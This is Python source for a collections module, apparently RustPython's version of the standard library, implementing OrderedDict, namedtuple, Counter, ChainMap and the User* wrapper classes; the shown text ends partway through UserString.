"MIT"
] | 1 | 2020-08-04T12:13:42.000Z | 2020-08-04T12:13:42.000Z | '''This module implements specialized container datatypes providing
alternatives to Python's general purpose built-in containers, dict,
list, set, and tuple.
* namedtuple factory function for creating tuple subclasses with named fields
* deque list-like container with fast appends and pops on either end
* ChainMap dict-like class for creating a single view of multiple mappings
* Counter dict subclass for counting hashable objects
* OrderedDict dict subclass that remembers the order entries were added
* defaultdict dict subclass that calls a factory function to supply missing values
* UserDict wrapper around dictionary objects for easier dict subclassing
* UserList wrapper around list objects for easier list subclassing
* UserString wrapper around string objects for easier string subclassing
'''
__all__ = [
'ChainMap',
'Counter',
'OrderedDict',
'UserDict',
'UserList',
'UserString',
'defaultdict',
'deque',
'namedtuple',
]
import _collections_abc
import heapq as _heapq
import sys as _sys
from itertools import chain as _chain
from itertools import repeat as _repeat
from itertools import starmap as _starmap
from keyword import iskeyword as _iskeyword
from operator import eq as _eq
from operator import itemgetter as _itemgetter
from reprlib import recursive_repr as _recursive_repr
from _weakref import proxy as _proxy
try:
from _collections import deque
except ImportError:
pass
else:
_collections_abc.MutableSequence.register(deque)
try:
from _collections import defaultdict
except ImportError:
# FIXME: try to implement defaultdict in collections.rs rather than in Python
# I (coolreader18) couldn't figure out some class stuff with __new__ and
# __init__ and __missing__ and subclassing built-in types from Rust, so I went
# with this instead.
from ._defaultdict import defaultdict
def __getattr__(name):
# For backwards compatibility, continue to make the collections ABCs
# through Python 3.6 available through the collections module.
# Note, no new collections ABCs were added in Python 3.7
if name in _collections_abc.__all__:
obj = getattr(_collections_abc, name)
import warnings
warnings.warn("Using or importing the ABCs from 'collections' instead "
"of from 'collections.abc' is deprecated since Python 3.3, "
"and in 3.10 it will stop working",
DeprecationWarning, stacklevel=2)
globals()[name] = obj
return obj
raise AttributeError(f'module {__name__!r} has no attribute {name!r}')
################################################################################
### OrderedDict
################################################################################
class _OrderedDictKeysView(_collections_abc.KeysView):
def __reversed__(self):
yield from reversed(self._mapping)
class _OrderedDictItemsView(_collections_abc.ItemsView):
def __reversed__(self):
for key in reversed(self._mapping):
yield (key, self._mapping[key])
class _OrderedDictValuesView(_collections_abc.ValuesView):
def __reversed__(self):
for key in reversed(self._mapping):
yield self._mapping[key]
class _Link(object):
__slots__ = 'prev', 'next', 'key', '__weakref__'
class OrderedDict(dict):
'Dictionary that remembers insertion order'
# An inherited dict maps keys to values.
# The inherited dict provides __getitem__, __len__, __contains__, and get.
# The remaining methods are order-aware.
# Big-O running times for all methods are the same as regular dictionaries.
# The internal self.__map dict maps keys to links in a doubly linked list.
# The circular doubly linked list starts and ends with a sentinel element.
# The sentinel element never gets deleted (this simplifies the algorithm).
# The sentinel is in self.__hardroot with a weakref proxy in self.__root.
# The prev links are weakref proxies (to prevent circular references).
# Individual links are kept alive by the hard reference in self.__map.
# Those hard references disappear when a key is deleted from an OrderedDict.
def __init__(*args, **kwds):
'''Initialize an ordered dictionary. The signature is the same as
regular dictionaries. Keyword argument order is preserved.
'''
if not args:
raise TypeError("descriptor '__init__' of 'OrderedDict' object "
"needs an argument")
self, *args = args
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__root
except AttributeError:
self.__hardroot = _Link()
self.__root = root = _proxy(self.__hardroot)
root.prev = root.next = root
self.__map = {}
self.__update(*args, **kwds)
def __setitem__(self, key, value,
dict_setitem=dict.__setitem__, proxy=_proxy, Link=_Link):
'od.__setitem__(i, y) <==> od[i]=y'
# Setting a new item creates a new link at the end of the linked list,
# and the inherited dictionary is updated with the new key/value pair.
if key not in self:
self.__map[key] = link = Link()
root = self.__root
last = root.prev
link.prev, link.next, link.key = last, root, key
last.next = link
root.prev = proxy(link)
dict_setitem(self, key, value)
def __delitem__(self, key, dict_delitem=dict.__delitem__):
'od.__delitem__(y) <==> del od[y]'
# Deleting an existing item uses self.__map to find the link which gets
# removed by updating the links in the predecessor and successor nodes.
dict_delitem(self, key)
link = self.__map.pop(key)
link_prev = link.prev
link_next = link.next
link_prev.next = link_next
link_next.prev = link_prev
link.prev = None
link.next = None
def __iter__(self):
'od.__iter__() <==> iter(od)'
# Traverse the linked list in order.
root = self.__root
curr = root.next
while curr is not root:
yield curr.key
curr = curr.next
def __reversed__(self):
'od.__reversed__() <==> reversed(od)'
# Traverse the linked list in reverse order.
root = self.__root
curr = root.prev
while curr is not root:
yield curr.key
curr = curr.prev
def clear(self):
'od.clear() -> None. Remove all items from od.'
root = self.__root
root.prev = root.next = root
self.__map.clear()
dict.clear(self)
def popitem(self, last=True):
'''Remove and return a (key, value) pair from the dictionary.
Pairs are returned in LIFO order if last is true or FIFO order if false.
'''
if not self:
raise KeyError('dictionary is empty')
root = self.__root
if last:
link = root.prev
link_prev = link.prev
link_prev.next = root
root.prev = link_prev
else:
link = root.next
link_next = link.next
root.next = link_next
link_next.prev = root
key = link.key
del self.__map[key]
value = dict.pop(self, key)
return key, value
def move_to_end(self, key, last=True):
'''Move an existing element to the end (or beginning if last is false).
Raise KeyError if the element does not exist.
'''
link = self.__map[key]
link_prev = link.prev
link_next = link.next
soft_link = link_next.prev
link_prev.next = link_next
link_next.prev = link_prev
root = self.__root
if last:
last = root.prev
link.prev = last
link.next = root
root.prev = soft_link
last.next = link
else:
first = root.next
link.prev = root
link.next = first
first.prev = soft_link
root.next = link
def __sizeof__(self):
sizeof = _sys.getsizeof
n = len(self) + 1 # number of links including root
size = sizeof(self.__dict__) # instance dictionary
size += sizeof(self.__map) * 2 # internal dict and inherited dict
size += sizeof(self.__hardroot) * n # link objects
size += sizeof(self.__root) * n # proxy objects
return size
update = __update = _collections_abc.MutableMapping.update
def keys(self):
"D.keys() -> a set-like object providing a view on D's keys"
return _OrderedDictKeysView(self)
def items(self):
"D.items() -> a set-like object providing a view on D's items"
return _OrderedDictItemsView(self)
def values(self):
"D.values() -> an object providing a view on D's values"
return _OrderedDictValuesView(self)
__ne__ = _collections_abc.MutableMapping.__ne__
__marker = object()
def pop(self, key, default=__marker):
'''od.pop(k[,d]) -> v, remove specified key and return the corresponding
value. If key is not found, d is returned if given, otherwise KeyError
is raised.
'''
if key in self:
result = self[key]
del self[key]
return result
if default is self.__marker:
raise KeyError(key)
return default
def setdefault(self, key, default=None):
'''Insert key with a value of default if key is not in the dictionary.
Return the value for key if key is in the dictionary, else default.
'''
if key in self:
return self[key]
self[key] = default
return default
@_recursive_repr()
def __repr__(self):
'od.__repr__() <==> repr(od)'
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, list(self.items()))
def __reduce__(self):
'Return state information for pickling'
inst_dict = vars(self).copy()
for k in vars(OrderedDict()):
inst_dict.pop(k, None)
return self.__class__, (), inst_dict or None, None, iter(self.items())
def copy(self):
'od.copy() -> a shallow copy of od'
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
'''Create a new ordered dictionary with keys from iterable and values set to value.
'''
self = cls()
for key in iterable:
self[key] = value
return self
def __eq__(self, other):
'''od.__eq__(y) <==> od==y. Comparison to another OD is order-sensitive
while comparison to a regular mapping is order-insensitive.
'''
if isinstance(other, OrderedDict):
return dict.__eq__(self, other) and all(map(_eq, self, other))
return dict.__eq__(self, other)
def __ior__(self, other):
self.update(other)
return self
def __or__(self, other):
if not isinstance(other, dict):
return NotImplemented
new = self.__class__(self)
new.update(other)
return new
def __ror__(self, other):
if not isinstance(other, dict):
return NotImplemented
new = self.__class__(other)
new.update(self)
return new
try:
from _collections import OrderedDict
except ImportError:
# Leave the pure Python version in place.
pass
################################################################################
### namedtuple
################################################################################
try:
from _collections import _tuplegetter
except ImportError:
_tuplegetter = lambda index, doc: property(_itemgetter(index), doc=doc)
def namedtuple(typename, field_names, *, rename=False, defaults=None, module=None):
"""Returns a new subclass of tuple with named fields.
>>> Point = namedtuple('Point', ['x', 'y'])
>>> Point.__doc__ # docstring for the new class
'Point(x, y)'
>>> p = Point(11, y=22) # instantiate with positional args or keywords
>>> p[0] + p[1] # indexable like a plain tuple
33
>>> x, y = p # unpack like a regular tuple
>>> x, y
(11, 22)
>>> p.x + p.y # fields also accessible by name
33
>>> d = p._asdict() # convert to a dictionary
>>> d['x']
11
>>> Point(**d) # convert from a dictionary
Point(x=11, y=22)
>>> p._replace(x=100) # _replace() is like str.replace() but targets named fields
Point(x=100, y=22)
"""
# Validate the field names. At the user's option, either generate an error
# message or automatically replace the field name with a valid name.
if isinstance(field_names, str):
field_names = field_names.replace(',', ' ').split()
field_names = list(map(str, field_names))
typename = _sys.intern(str(typename))
if rename:
seen = set()
for index, name in enumerate(field_names):
if (not name.isidentifier()
or _iskeyword(name)
or name.startswith('_')
or name in seen):
field_names[index] = f'_{index}'
seen.add(name)
for name in [typename] + field_names:
if type(name) is not str:
raise TypeError('Type names and field names must be strings')
if not name.isidentifier():
raise ValueError('Type names and field names must be valid '
f'identifiers: {name!r}')
if _iskeyword(name):
raise ValueError('Type names and field names cannot be a '
f'keyword: {name!r}')
seen = set()
for name in field_names:
if name.startswith('_') and not rename:
raise ValueError('Field names cannot start with an underscore: '
f'{name!r}')
if name in seen:
raise ValueError(f'Encountered duplicate field name: {name!r}')
seen.add(name)
field_defaults = {}
if defaults is not None:
defaults = tuple(defaults)
if len(defaults) > len(field_names):
raise TypeError('Got more default values than field names')
field_defaults = dict(reversed(list(zip(reversed(field_names),
reversed(defaults)))))
# Variables used in the methods and docstrings
field_names = tuple(map(_sys.intern, field_names))
num_fields = len(field_names)
arg_list = ', '.join(field_names)
if num_fields == 1:
arg_list += ','
repr_fmt = '(' + ', '.join(f'{name}=%r' for name in field_names) + ')'
tuple_new = tuple.__new__
_dict, _tuple, _len, _map, _zip = dict, tuple, len, map, zip
# Create all the named tuple methods to be added to the class namespace
namespace = {
'_tuple_new': tuple_new,
'__builtins__': {},
'__name__': f'namedtuple_{typename}',
}
code = f'lambda _cls, {arg_list}: _tuple_new(_cls, ({arg_list}))'
__new__ = eval(code, namespace)
__new__.__name__ = '__new__'
__new__.__doc__ = f'Create new instance of {typename}({arg_list})'
if defaults is not None:
__new__.__defaults__ = defaults
@classmethod
def _make(cls, iterable):
result = tuple_new(cls, iterable)
if _len(result) != num_fields:
raise TypeError(f'Expected {num_fields} arguments, got {len(result)}')
return result
_make.__func__.__doc__ = (f'Make a new {typename} object from a sequence '
'or iterable')
def _replace(_self, /, **kwds):
result = _self._make(_map(kwds.pop, field_names, _self))
if kwds:
raise ValueError(f'Got unexpected field names: {list(kwds)!r}')
return result
_replace.__doc__ = (f'Return a new {typename} object replacing specified '
'fields with new values')
def __repr__(self):
'Return a nicely formatted representation string'
return self.__class__.__name__ + repr_fmt % self
def _asdict(self):
'Return a new dict which maps field names to their values.'
return _dict(_zip(self._fields, self))
def __getnewargs__(self):
'Return self as a plain tuple. Used by copy and pickle.'
return _tuple(self)
# Modify function metadata to help with introspection and debugging
for method in (
__new__,
_make.__func__,
_replace,
__repr__,
_asdict,
__getnewargs__,
):
method.__qualname__ = f'{typename}.{method.__name__}'
# Build-up the class namespace dictionary
# and use type() to build the result class
class_namespace = {
'__doc__': f'{typename}({arg_list})',
'__slots__': (),
'_fields': field_names,
'_field_defaults': field_defaults,
'__new__': __new__,
'_make': _make,
'_replace': _replace,
'__repr__': __repr__,
'_asdict': _asdict,
'__getnewargs__': __getnewargs__,
}
for index, name in enumerate(field_names):
doc = _sys.intern(f'Alias for field number {index}')
class_namespace[name] = _tuplegetter(index, doc)
result = type(typename, (tuple,), class_namespace)
# For pickling to work, the __module__ variable needs to be set to the frame
# where the named tuple is created. Bypass this step in environments where
# sys._getframe is not defined (Jython for example) or sys._getframe is not
# defined for arguments greater than 0 (IronPython), or where the user has
# specified a particular module.
if module is None:
try:
module = _sys._getframe(1).f_globals.get('__name__', '__main__')
except (AttributeError, ValueError):
pass
if module is not None:
result.__module__ = module
return result
########################################################################
### Counter
########################################################################
def _count_elements(mapping, iterable):
'Tally elements from the iterable.'
mapping_get = mapping.get
for elem in iterable:
mapping[elem] = mapping_get(elem, 0) + 1
try: # Load C helper function if available
from _collections import _count_elements
except ImportError:
pass
class Counter(dict):
'''Dict subclass for counting hashable items. Sometimes called a bag
or multiset. Elements are stored as dictionary keys and their counts
are stored as dictionary values.
>>> c = Counter('abcdeabcdabcaba') # count elements from a string
>>> c.most_common(3) # three most common elements
[('a', 5), ('b', 4), ('c', 3)]
>>> sorted(c) # list all unique elements
['a', 'b', 'c', 'd', 'e']
>>> ''.join(sorted(c.elements())) # list elements with repetitions
'aaaaabbbbcccdde'
>>> sum(c.values()) # total of all counts
15
>>> c['a'] # count of letter 'a'
5
>>> for elem in 'shazam': # update counts from an iterable
... c[elem] += 1 # by adding 1 to each element's count
>>> c['a'] # now there are seven 'a'
7
>>> del c['b'] # remove all 'b'
>>> c['b'] # now there are zero 'b'
0
>>> d = Counter('simsalabim') # make another counter
>>> c.update(d) # add in the second counter
>>> c['a'] # now there are nine 'a'
9
>>> c.clear() # empty the counter
>>> c
Counter()
Note: If a count is set to zero or reduced to zero, it will remain
in the counter until the entry is deleted or the counter is cleared:
>>> c = Counter('aaabbc')
>>> c['b'] -= 2 # reduce the count of 'b' by two
>>> c.most_common() # 'b' is still in, but its count is zero
[('a', 3), ('c', 1), ('b', 0)]
'''
# References:
# http://en.wikipedia.org/wiki/Multiset
# http://www.gnu.org/software/smalltalk/manual-base/html_node/Bag.html
# http://www.demo2s.com/Tutorial/Cpp/0380__set-multiset/Catalog0380__set-multiset.htm
# http://code.activestate.com/recipes/259174/
# Knuth, TAOCP Vol. II section 4.6.3
def __init__(*args, **kwds):
'''Create a new, empty Counter object. And if given, count elements
from an input iterable. Or, initialize the count from another mapping
of elements to their counts.
>>> c = Counter() # a new, empty counter
>>> c = Counter('gallahad') # a new counter from an iterable
>>> c = Counter({'a': 4, 'b': 2}) # a new counter from a mapping
>>> c = Counter(a=4, b=2) # a new counter from keyword args
'''
if not args:
raise TypeError("descriptor '__init__' of 'Counter' object "
"needs an argument")
self, *args = args
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
super(Counter, self).__init__()
self.update(*args, **kwds)
def __missing__(self, key):
'The count of elements not in the Counter is zero.'
# Needed so that self[missing_item] does not raise KeyError
return 0
def most_common(self, n=None):
'''List the n most common elements and their counts from the most
common to the least. If n is None, then list all element counts.
>>> Counter('abracadabra').most_common(3)
[('a', 5), ('b', 2), ('r', 2)]
'''
# Emulate Bag.sortedByCount from Smalltalk
if n is None:
return sorted(self.items(), key=_itemgetter(1), reverse=True)
return _heapq.nlargest(n, self.items(), key=_itemgetter(1))
def elements(self):
'''Iterator over elements repeating each as many times as its count.
>>> c = Counter('ABCABC')
>>> sorted(c.elements())
['A', 'A', 'B', 'B', 'C', 'C']
# Knuth's example for prime factors of 1836: 2**2 * 3**3 * 17**1
>>> prime_factors = Counter({2: 2, 3: 3, 17: 1})
>>> product = 1
>>> for factor in prime_factors.elements(): # loop over factors
... product *= factor # and multiply them
>>> product
1836
Note, if an element's count has been set to zero or is a negative
number, elements() will ignore it.
'''
# Emulate Bag.do from Smalltalk and Multiset.begin from C++.
return _chain.from_iterable(_starmap(_repeat, self.items()))
# Override dict methods where necessary
@classmethod
def fromkeys(cls, iterable, v=None):
# There is no equivalent method for counters because the semantics
# would be ambiguous in cases such as Counter.fromkeys('aaabbc', v=2).
# Initializing counters to zero values isn't necessary because zero
# is already the default value for counter lookups. Initializing
# to one is easily accomplished with Counter(set(iterable)). For
# more exotic cases, create a dictionary first using a dictionary
# comprehension or dict.fromkeys().
raise NotImplementedError(
'Counter.fromkeys() is undefined. Use Counter(iterable) instead.')
def update(*args, **kwds):
'''Like dict.update() but add counts instead of replacing them.
Source can be an iterable, a dictionary, or another Counter instance.
>>> c = Counter('which')
>>> c.update('witch') # add elements from another iterable
>>> d = Counter('watch')
>>> c.update(d) # add elements from another counter
>>> c['h'] # four 'h' in which, witch, and watch
4
'''
# The regular dict.update() operation makes no sense here because the
# replace behavior results in the some of original untouched counts
# being mixed-in with all of the other counts for a mismash that
# doesn't have a straight-forward interpretation in most counting
# contexts. Instead, we implement straight-addition. Both the inputs
# and outputs are allowed to contain zero and negative counts.
if not args:
raise TypeError("descriptor 'update' of 'Counter' object "
"needs an argument")
self, *args = args
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
iterable = args[0] if args else None
if iterable is not None:
if isinstance(iterable, _collections_abc.Mapping):
if self:
self_get = self.get
for elem, count in iterable.items():
self[elem] = count + self_get(elem, 0)
else:
# fast path when counter is empty
super(Counter, self).update(iterable)
else:
_count_elements(self, iterable)
if kwds:
self.update(kwds)
def subtract(*args, **kwds):
'''Like dict.update() but subtracts counts instead of replacing them.
Counts can be reduced below zero. Both the inputs and outputs are
allowed to contain zero and negative counts.
Source can be an iterable, a dictionary, or another Counter instance.
>>> c = Counter('which')
>>> c.subtract('witch') # subtract elements from another iterable
>>> c.subtract(Counter('watch')) # subtract elements from another counter
>>> c['h'] # 2 in which, minus 1 in witch, minus 1 in watch
0
>>> c['w'] # 1 in which, minus 1 in witch, minus 1 in watch
-1
'''
if not args:
raise TypeError("descriptor 'subtract' of 'Counter' object "
"needs an argument")
self, *args = args
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
iterable = args[0] if args else None
if iterable is not None:
self_get = self.get
if isinstance(iterable, _collections_abc.Mapping):
for elem, count in iterable.items():
self[elem] = self_get(elem, 0) - count
else:
for elem in iterable:
self[elem] = self_get(elem, 0) - 1
if kwds:
self.subtract(kwds)
def copy(self):
'Return a shallow copy.'
return self.__class__(self)
def __reduce__(self):
return self.__class__, (dict(self),)
def __delitem__(self, elem):
'Like dict.__delitem__() but does not raise KeyError for missing values.'
if elem in self:
super().__delitem__(elem)
def __repr__(self):
if not self:
return f'{self.__class__.__name__}()'
try:
# dict() preserves the ordering returned by most_common()
d = dict(self.most_common())
except TypeError:
# handle case where values are not orderable
d = dict(self)
return f'{self.__class__.__name__}({d!r})'
# Multiset-style mathematical operations discussed in:
# Knuth TAOCP Volume II section 4.6.3 exercise 19
# and at http://en.wikipedia.org/wiki/Multiset
#
# Outputs guaranteed to only include positive counts.
#
# To strip negative and zero counts, add-in an empty counter:
# c += Counter()
#
# Rich comparison operators for multiset subset and superset tests
# are deliberately omitted due to semantic conflicts with the
# existing inherited dict equality method. Subset and superset
# semantics ignore zero counts and require that pโคq โง pโฅq โ p=q;
# however, that would not be the case for p=Counter(a=1, b=0)
# and q=Counter(a=1) where the dictionaries are not equal.
def __add__(self, other):
'''Add counts from two counters.
>>> Counter('abbb') + Counter('bcc')
Counter({'b': 4, 'c': 2, 'a': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
newcount = count + other[elem]
if newcount > 0:
result[elem] = newcount
for elem, count in other.items():
if elem not in self and count > 0:
result[elem] = count
return result
def __sub__(self, other):
''' Subtract count, but keep only results with positive counts.
>>> Counter('abbbc') - Counter('bccd')
Counter({'b': 2, 'a': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
newcount = count - other[elem]
if newcount > 0:
result[elem] = newcount
for elem, count in other.items():
if elem not in self and count < 0:
result[elem] = 0 - count
return result
def __or__(self, other):
'''Union is the maximum of value in either of the input counters.
>>> Counter('abbb') | Counter('bcc')
Counter({'b': 3, 'c': 2, 'a': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
other_count = other[elem]
newcount = other_count if count < other_count else count
if newcount > 0:
result[elem] = newcount
for elem, count in other.items():
if elem not in self and count > 0:
result[elem] = count
return result
def __and__(self, other):
''' Intersection is the minimum of corresponding counts.
>>> Counter('abbb') & Counter('bcc')
Counter({'b': 1})
'''
if not isinstance(other, Counter):
return NotImplemented
result = Counter()
for elem, count in self.items():
other_count = other[elem]
newcount = count if count < other_count else other_count
if newcount > 0:
result[elem] = newcount
return result
def __pos__(self):
'Adds an empty counter, effectively stripping negative and zero counts'
result = Counter()
for elem, count in self.items():
if count > 0:
result[elem] = count
return result
def __neg__(self):
'''Subtracts from an empty counter. Strips positive and zero counts,
and flips the sign on negative counts.
'''
result = Counter()
for elem, count in self.items():
if count < 0:
result[elem] = 0 - count
return result
def _keep_positive(self):
'''Internal method to strip elements with a negative or zero count'''
nonpositive = [elem for elem, count in self.items() if not count > 0]
for elem in nonpositive:
del self[elem]
return self
def __iadd__(self, other):
'''Inplace add from another counter, keeping only positive counts.
>>> c = Counter('abbb')
>>> c += Counter('bcc')
>>> c
Counter({'b': 4, 'c': 2, 'a': 1})
'''
for elem, count in other.items():
self[elem] += count
return self._keep_positive()
def __isub__(self, other):
'''Inplace subtract counter, but keep only results with positive counts.
>>> c = Counter('abbbc')
>>> c -= Counter('bccd')
>>> c
Counter({'b': 2, 'a': 1})
'''
for elem, count in other.items():
self[elem] -= count
return self._keep_positive()
def __ior__(self, other):
'''Inplace union is the maximum of value from either counter.
>>> c = Counter('abbb')
>>> c |= Counter('bcc')
>>> c
Counter({'b': 3, 'c': 2, 'a': 1})
'''
for elem, other_count in other.items():
count = self[elem]
if other_count > count:
self[elem] = other_count
return self._keep_positive()
def __iand__(self, other):
'''Inplace intersection is the minimum of corresponding counts.
>>> c = Counter('abbb')
>>> c &= Counter('bcc')
>>> c
Counter({'b': 1})
'''
for elem, count in self.items():
other_count = other[elem]
if other_count < count:
self[elem] = other_count
return self._keep_positive()
########################################################################
### ChainMap
########################################################################
class ChainMap(_collections_abc.MutableMapping):
''' A ChainMap groups multiple dicts (or other mappings) together
to create a single, updateable view.
The underlying mappings are stored in a list. That list is public and can
be accessed or updated using the *maps* attribute. There is no other
state.
Lookups search the underlying mappings successively until a key is found.
In contrast, writes, updates, and deletions only operate on the first
mapping.
'''
def __init__(self, *maps):
'''Initialize a ChainMap by setting *maps* to the given mappings.
If no mappings are provided, a single empty dictionary is used.
'''
self.maps = list(maps) or [{}] # always at least one map
def __missing__(self, key):
raise KeyError(key)
def __getitem__(self, key):
for mapping in self.maps:
try:
return mapping[key] # can't use 'key in mapping' with defaultdict
except KeyError:
pass
return self.__missing__(key) # support subclasses that define __missing__
def get(self, key, default=None):
return self[key] if key in self else default
def __len__(self):
return len(set().union(*self.maps)) # reuses stored hash values if possible
def __iter__(self):
d = {}
for mapping in reversed(self.maps):
d.update(dict.fromkeys(mapping)) # reuses stored hash values if possible
return iter(d)
def __contains__(self, key):
return any(key in m for m in self.maps)
def __bool__(self):
return any(self.maps)
@_recursive_repr()
def __repr__(self):
return f'{self.__class__.__name__}({", ".join(map(repr, self.maps))})'
@classmethod
def fromkeys(cls, iterable, *args):
'Create a ChainMap with a single dict created from the iterable.'
return cls(dict.fromkeys(iterable, *args))
def copy(self):
'New ChainMap or subclass with a new copy of maps[0] and refs to maps[1:]'
return self.__class__(self.maps[0].copy(), *self.maps[1:])
__copy__ = copy
def new_child(self, m=None): # like Django's Context.push()
'''New ChainMap with a new map followed by all previous maps.
If no map is provided, an empty dict is used.
'''
if m is None:
m = {}
return self.__class__(m, *self.maps)
@property
def parents(self): # like Django's Context.pop()
'New ChainMap from maps[1:].'
return self.__class__(*self.maps[1:])
def __setitem__(self, key, value):
self.maps[0][key] = value
def __delitem__(self, key):
try:
del self.maps[0][key]
except KeyError:
raise KeyError(f'Key not found in the first mapping: {key!r}')
def popitem(self):
'Remove and return an item pair from maps[0]. Raise KeyError is maps[0] is empty.'
try:
return self.maps[0].popitem()
except KeyError:
raise KeyError('No keys found in the first mapping.')
def pop(self, key, *args):
'Remove *key* from maps[0] and return its value. Raise KeyError if *key* not in maps[0].'
try:
return self.maps[0].pop(key, *args)
except KeyError:
raise KeyError(f'Key not found in the first mapping: {key!r}')
def clear(self):
'Clear maps[0], leaving maps[1:] intact.'
self.maps[0].clear()
def __ior__(self, other):
self.maps[0].update(other)
return self
def __or__(self, other):
if not isinstance(other, _collections_abc.Mapping):
return NotImplemented
m = self.copy()
m.maps[0].update(other)
return m
def __ror__(self, other):
if not isinstance(other, _collections_abc.Mapping):
return NotImplemented
m = dict(other)
for child in reversed(self.maps):
m.update(child)
return self.__class__(m)
################################################################################
### UserDict
################################################################################
class UserDict(_collections_abc.MutableMapping):
# Start by filling-out the abstract methods
def __init__(*args, **kwargs):
if not args:
raise TypeError("descriptor '__init__' of 'UserDict' object "
"needs an argument")
self, *args = args
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
if args:
dict = args[0]
elif 'dict' in kwargs:
dict = kwargs.pop('dict')
import warnings
warnings.warn("Passing 'dict' as keyword argument is deprecated",
DeprecationWarning, stacklevel=2)
else:
dict = None
self.data = {}
if dict is not None:
self.update(dict)
if len(kwargs):
self.update(kwargs)
def __len__(self):
return len(self.data)
def __bool__(self):
return bool(self.data)
def __getitem__(self, key):
if key in self.data:
return self.data[key]
if hasattr(self.__class__, "__missing__"):
return self.__class__.__missing__(self, key)
raise KeyError(key)
def __setitem__(self, key, item):
self.data[key] = item
def __delitem__(self, key):
del self.data[key]
def __iter__(self):
return iter(self.data)
# Modify __contains__ to work correctly when __missing__ is present
def __contains__(self, key):
return key in self.data
# Now, add the methods in dicts but not in MutableMapping
def __repr__(self):
return repr(self.data)
def __or__(self, other):
if isinstance(other, UserDict):
return self.__class__(self.data | other.data)
if isinstance(other, dict):
return self.__class__(self.data | other)
return NotImplemented
def __ror__(self, other):
if isinstance(other, UserDict):
return self.__class__(other.data | self.data)
if isinstance(other, dict):
return self.__class__(other | self.data)
return NotImplemented
def __ior__(self, other):
if isinstance(other, UserDict):
self.data |= other.data
else:
self.data |= other
return self
def __copy__(self):
inst = self.__class__.__new__(self.__class__)
inst.__dict__.update(self.__dict__)
# Create a copy and avoid triggering descriptors
inst.__dict__["data"] = self.__dict__["data"].copy()
return inst
def __sizeof__(self):
return _sys.getsizeof(self.data)
def copy(self):
if self.__class__ is UserDict:
return UserDict(self.data.copy())
import copy
data = self.data
try:
self.data = {}
c = copy.copy(self)
finally:
self.data = data
c.update(self)
return c
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
################################################################################
### UserList
################################################################################
class UserList(_collections_abc.MutableSequence):
"""A more or less complete user-defined wrapper around list objects."""
def __init__(self, initlist=None):
self.data = []
if initlist is not None:
# XXX should this accept an arbitrary sequence?
if type(initlist) == type(self.data):
self.data[:] = initlist
elif isinstance(initlist, UserList):
self.data[:] = initlist.data[:]
else:
self.data = list(initlist)
def __repr__(self):
return repr(self.data)
def __lt__(self, other):
return self.data < self.__cast(other)
def __le__(self, other):
return self.data <= self.__cast(other)
def __eq__(self, other):
return self.data == self.__cast(other)
def __gt__(self, other):
return self.data > self.__cast(other)
def __ge__(self, other):
return self.data >= self.__cast(other)
def __cast(self, other):
return other.data if isinstance(other, UserList) else other
def __contains__(self, item):
return item in self.data
def __len__(self):
return len(self.data)
def __bool__(self):
return bool(self.data)
def __getitem__(self, i):
if isinstance(i, slice):
return self.__class__(self.data[i])
else:
return self.data[i]
def __setitem__(self, i, item):
self.data[i] = item
def __delitem__(self, i):
del self.data[i]
def __add__(self, other):
if isinstance(other, UserList):
return self.__class__(self.data + other.data)
elif isinstance(other, type(self.data)):
return self.__class__(self.data + other)
return self.__class__(self.data + list(other))
def __radd__(self, other):
if isinstance(other, UserList):
return self.__class__(other.data + self.data)
elif isinstance(other, type(self.data)):
return self.__class__(other + self.data)
return self.__class__(list(other) + self.data)
def __iadd__(self, other):
if isinstance(other, UserList):
self.data += other.data
elif isinstance(other, type(self.data)):
self.data += other
else:
self.data += list(other)
return self
def __mul__(self, n):
return self.__class__(self.data * n)
__rmul__ = __mul__
def __imul__(self, n):
self.data *= n
return self
def __copy__(self):
inst = self.__class__.__new__(self.__class__)
inst.__dict__.update(self.__dict__)
# Create a copy and avoid triggering descriptors
inst.__dict__["data"] = self.__dict__["data"][:]
return inst
def __sizeof__(self):
return _sys.getsizeof(self.data)
def append(self, item):
self.data.append(item)
def insert(self, i, item):
self.data.insert(i, item)
def pop(self, i=-1):
return self.data.pop(i)
def remove(self, item):
self.data.remove(item)
def clear(self):
self.data.clear()
def copy(self):
return self.__class__(self)
def count(self, item):
return self.data.count(item)
def index(self, item, *args):
return self.data.index(item, *args)
def reverse(self):
self.data.reverse()
def sort(self, /, *args, **kwds):
self.data.sort(*args, **kwds)
def extend(self, other):
if isinstance(other, UserList):
self.data.extend(other.data)
else:
self.data.extend(other)
################################################################################
### UserString
################################################################################
class UserString(_collections_abc.Sequence):
def __init__(self, seq):
if isinstance(seq, str):
self.data = seq
elif isinstance(seq, UserString):
self.data = seq.data[:]
else:
self.data = str(seq)
def __str__(self):
return str(self.data)
def __repr__(self):
return repr(self.data)
def __int__(self):
return int(self.data)
def __float__(self):
return float(self.data)
def __complex__(self):
return complex(self.data)
def __hash__(self):
return hash(self.data)
def __getnewargs__(self):
return (self.data[:],)
def __eq__(self, string):
if isinstance(string, UserString):
return self.data == string.data
return self.data == string
def __lt__(self, string):
if isinstance(string, UserString):
return self.data < string.data
return self.data < string
def __le__(self, string):
if isinstance(string, UserString):
return self.data <= string.data
return self.data <= string
def __gt__(self, string):
if isinstance(string, UserString):
return self.data > string.data
return self.data > string
def __ge__(self, string):
if isinstance(string, UserString):
return self.data >= string.data
return self.data >= string
def __contains__(self, char):
if isinstance(char, UserString):
char = char.data
return char in self.data
def __bool__(self):
return bool(self.data)
def __len__(self):
return len(self.data)
def __getitem__(self, index):
return self.__class__(self.data[index])
def __add__(self, other):
if isinstance(other, UserString):
return self.__class__(self.data + other.data)
elif isinstance(other, str):
return self.__class__(self.data + other)
return self.__class__(self.data + str(other))
def __radd__(self, other):
if isinstance(other, str):
